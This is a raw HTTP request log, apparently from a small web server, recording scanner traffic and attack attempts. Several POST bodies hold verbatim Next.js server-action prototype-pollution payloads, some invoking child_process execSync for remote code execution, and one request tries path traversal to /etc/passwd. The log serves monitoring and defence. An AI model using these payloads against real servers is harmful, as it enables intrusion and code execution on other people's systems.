[2026-03-06 12:49:11] Main page accessed - IP: 205.210.31.47:62900
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 205.210.31.47:62900
Path: /
URL: /
Method: GET
[2026-03-06 12:49:11] === HTTP Request ===
[2026-03-06 12:39:33] Main page accessed - IP: 195.3.221.86:60924
===================
Connection: close
User-Agent: python-requests/2.31.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:60924
Path: /
URL: /
Method: GET
[2026-03-06 12:39:33] === HTTP Request ===
[2026-03-06 12:12:10] Main page accessed - IP: 207.90.244.22:50018
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.22:50018
Path: /
URL: /
Method: GET
[2026-03-06 12:12:10] === HTTP Request ===
[2026-03-06 12:09:08] Main page accessed - IP: 198.235.24.57:62384
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: warehouse.vulnberries.ru
RemoteAddr: 198.235.24.57:62384
Path: /
URL: /
Method: GET
[2026-03-06 12:09:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:52132
Path: /jars
URL: /jars
Method: GET
[2026-03-06 11:17:09] === HTTP Request ===
[2026-03-06 11:07:53] Main page accessed - IP: 35.240.62.18:44382
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.240.62.18:44382
Path: /
URL: /
Method: GET
[2026-03-06 11:07:53] === HTTP Request ===
[2026-03-06 10:33:47] Main page accessed - IP: 172.30.0.12:41484
===================
----------WebKitFormBoundarya8b2ace3ffa24a46--
[]
Content-Disposition: form-data; name="2"
----------WebKitFormBoundarya8b2ace3ffa24a46
"$@0"
Content-Disposition: form-data; name="1"
----------WebKitFormBoundarya8b2ace3ffa24a46
{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "throw Object.assign(new Error('NEXT_REDIRECT'),{digest: 'NEXT_REDIRECT;push;/safe_check_11111;307;'});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ----------WebKitFormBoundarya8b2ace3ffa24a46
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 34.209.47.6
Next-Action: x
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundarya8b2ace3ffa24a46
Content-Length: 636
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
X-Nextjs-Request-Id: 2dedfa6e
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41484
Path: /
URL: /
Method: POST
[2026-03-06 10:33:47] === HTTP Request ===
[2026-03-06 10:33:47] Main page accessed - IP: 172.30.0.12:41484
===================
----------WebKitFormBoundary9e7f3a5e509742f7--
[]
Content-Disposition: form-data; name="2"
----------WebKitFormBoundary9e7f3a5e509742f7
"$@0"
Content-Disposition: form-data; name="1"
----------WebKitFormBoundary9e7f3a5e509742f7
{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
----------WebKitFormBoundary9e7f3a5e509742f7
""
Content-Disposition: form-data; name="1_$ACTION_ID_vercel"
Body: ----------WebKitFormBoundary9e7f3a5e509742f7
X-Forwarded-Proto: https
Next-Action: x
Accept: */*
Content-Length: 860
X-Nextjs-Request-Id: 2dedfa6e
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundary9e7f3a5e509742f7
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 34.209.47.6
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41484
Path: /
URL: /
Method: POST
[2026-03-06 10:33:47] === HTTP Request ===
[2026-03-06 10:33:46] Main page accessed - IP: 172.30.0.12:41484
===================
----------WebKitFormBoundary3bb5e9b4fc95493a--
[]
Content-Disposition: form-data; name="2"
----------WebKitFormBoundary3bb5e9b4fc95493a
"$@0"
Content-Disposition: form-data; name="1"
----------WebKitFormBoundary3bb5e9b4fc95493a
{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ----------WebKitFormBoundary3bb5e9b4fc95493a
X-Nextjs-Request-Id: 2dedfa6e
X-Forwarded-Proto: https
X-Forwarded-For: 34.209.47.6
Via: 1.1 Caddy
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundary3bb5e9b4fc95493a
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 748
X-Forwarded-Host: admin.vulnberries.ru
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41484
Path: /
URL: /
Method: POST
[2026-03-06 10:33:46] === HTTP Request ===
[2026-03-06 10:33:46] Main page accessed - IP: 172.30.0.12:41484
===================
X-Nextjs-Request-Id: 2dedfa6e
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 34.209.47.6
Via: 1.1 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Next-Action: x
Accept-Encoding: gzip, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41484
Path: /
URL: /
Method: GET
[2026-03-06 10:33:46] === HTTP Request ===
===================
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.108:43590
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-06 10:29:02] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.108:43382
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-06 10:29:02] === HTTP Request ===
[2026-03-06 10:29:01] Main page accessed - IP: 45.142.154.108:43186
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.108:43186
Path: /
URL: /
Method: GET
[2026-03-06 10:29:01] === HTTP Request ===
[2026-03-06 10:29:00] Main page accessed - IP: 45.142.154.108:43078
===================
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.108:43078
Path: /
URL: /
Method: GET
[2026-03-06 10:29:00] === HTTP Request ===
===================
------WebKitFormBoundaryx390612533297--
------WebKitFormBoundaryx390612533297
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx390612533297
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 151442+true+2579288;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx390612533297
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_390612533297
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx390612533297
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:50018
Path: /api/route
URL: /api/route
Method: POST
[2026-03-06 09:59:24] === HTTP Request ===
===================
------WebKitFormBoundaryx140600713681--
------WebKitFormBoundaryx140600713681
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx140600713681
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 26460+true+5313708;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx140600713681
X-Nextjs-Html-Request-Id: ilovepoop_140600713681
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx140600713681
X-Nextjs-Request-Id: poop1234
Content-Length: 517
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49972
Path: /app
URL: /app
Method: POST
[2026-03-06 09:59:24] === HTTP Request ===
===================
------WebKitFormBoundaryx21992587475--
------WebKitFormBoundaryx21992587475
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx21992587475
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 14963+true+1469798;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx21992587475
X-Nextjs-Html-Request-Id: ilovepoop_21992587475
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx21992587475
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 513
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49964
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-06 09:59:20] === HTTP Request ===
===================
------WebKitFormBoundaryx679922753814--
------WebKitFormBoundaryx679922753814
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx679922753814
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 135937+true+5001749;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx679922753814
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_679922753814
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx679922753814
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53268
Path: /api
URL: /api
Method: POST
[2026-03-06 09:59:20] === HTTP Request ===
===================
------WebKitFormBoundaryx49803796351--
------WebKitFormBoundaryx49803796351
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx49803796351
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 26565+true+1874790;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx49803796351
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx49803796351
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_49803796351
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53264
Path: /_next
URL: /_next
Method: POST
[2026-03-06 09:59:17] === HTTP Request ===
[2026-03-06 09:59:17] Main page accessed - IP: 195.3.221.86:53232
===================
------WebKitFormBoundaryx1617230348761--
------WebKitFormBoundaryx1617230348761
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1617230348761
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 239033+true+6765720;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1617230348761
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1617230348761
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1617230348761
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53232
Path: /
URL: /
Method: POST
[2026-03-06 09:59:17] === HTTP Request ===
[2026-03-06 09:59:14] Main page accessed - IP: 195.3.221.86:53222
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53222
Path: /
URL: /
Method: GET
[2026-03-06 09:59:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.137:46568
Query: landat=%2Fauth%2Frefresh%3Flandat%3D%252Fauth%252Frefresh%253Flandat%253D%25252Fauth%25252Frefresh%25253Flandat%25253D%2525252Fauth%2525252Frefresh%2525253Flandat%2525253D%252525252Fauth%252525252Frefresh%252525253Flandat%252525253D%25252525252Fui%25252525252F
Path: /auth/refresh
URL: /auth/refresh?landat=%2Fauth%2Frefresh%3Flandat%3D%252Fauth%252Frefresh%253Flandat%253D%25252Fauth%25252Frefresh%25253Flandat%25253D%2525252Fauth%2525252Frefresh%2525253Flandat%2525253D%252525252Fauth%252525252Frefresh%252525253Flandat%252525253D%25252525252Fui%25252525252F
Method: GET
[2026-03-06 08:36:25] === HTTP Request ===
===================
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
X-Forwarded-For: 178.120.10.109
Sec-Fetch-Dest: image
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=1, i
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48176
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-06 08:29:10] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.120.10.109
Sec-Fetch-Dest: script
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/login
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: */*
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48176
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-06 08:29:10] === HTTP Request ===
===================
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/login
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.120.10.109
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48176
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-06 08:29:10] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Sec-Fetch-Dest: style
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/login
Priority: u=0
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.120.10.109
Accept: text/css,*/*;q=0.1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48176
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-06 08:29:10] === HTTP Request ===
[2026-03-06 08:29:10] Login page accessed - IP: 172.30.0.12:48176
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Cache-Control: max-age=0
Referer: https://admin.vulnberries.ru/
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
X-Forwarded-For: 178.120.10.109
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=0, i
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48176
Path: /login
URL: /login
Method: GET
[2026-03-06 08:29:10] === HTTP Request ===
[2026-03-06 08:04:59] Main page accessed - IP: 198.235.24.218:56859
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.218:56859
Path: /
URL: /
Method: GET
[2026-03-06 08:04:59] === HTTP Request ===
[2026-03-06 06:34:11] Main page accessed - IP: 176.65.149.45:40720
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:40720
Path: /
URL: /
Method: GET
[2026-03-06 06:34:11] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 64.89.160.111:8468
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-06 06:31:31] === HTTP Request ===
[2026-03-06 06:19:25] Main page accessed - IP: 64.226.86.7:60662
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.226.86.7:60662
Path: /
URL: /
Method: GET
[2026-03-06 06:19:25] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.184.76.71:44261
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-06 06:15:40] === HTTP Request ===
[2026-03-06 06:13:31] Main page accessed - IP: 91.230.168.121:46433
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.121:46433
Path: /
URL: /
Method: GET
[2026-03-06 06:13:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.181.190.188:33098
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-06 04:04:31] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:60212
Path: /jars
URL: /jars
Method: GET
[2026-03-06 03:50:50] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.190.69.241:43264
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-06 03:32:00] === HTTP Request ===
===================
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.190.69.241:43280
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-06 03:32:00] === HTTP Request ===
[2026-03-06 03:32:00] Main page accessed - IP: 146.190.69.241:43250
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.190.69.241:43250
Path: /
URL: /
Method: GET
[2026-03-06 03:32:00] === HTTP Request ===
[2026-03-06 03:31:10] Main page accessed - IP: 159.223.184.214:51050
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.223.184.214:51050
Path: /
URL: /
Method: GET
[2026-03-06 03:31:10] === HTTP Request ===
===================
------WebKitFormBoundaryx2556601250911--
------WebKitFormBoundaryx2556601250911
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2556601250911
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 308910+true+8276201;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2556601250911
X-Nextjs-Html-Request-Id: ilovepoop_2556601250911
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2556601250911
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42674
Path: /api/route
URL: /api/route
Method: POST
[2026-03-06 02:32:19] === HTTP Request ===
===================
------WebKitFormBoundaryx1861552744150--
------WebKitFormBoundaryx1861552744150
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1861552744150
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 235501+true+7904649;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1861552744150
X-Nextjs-Html-Request-Id: ilovepoop_1861552744150
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1861552744150
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42672
Path: /app
URL: /app
Method: POST
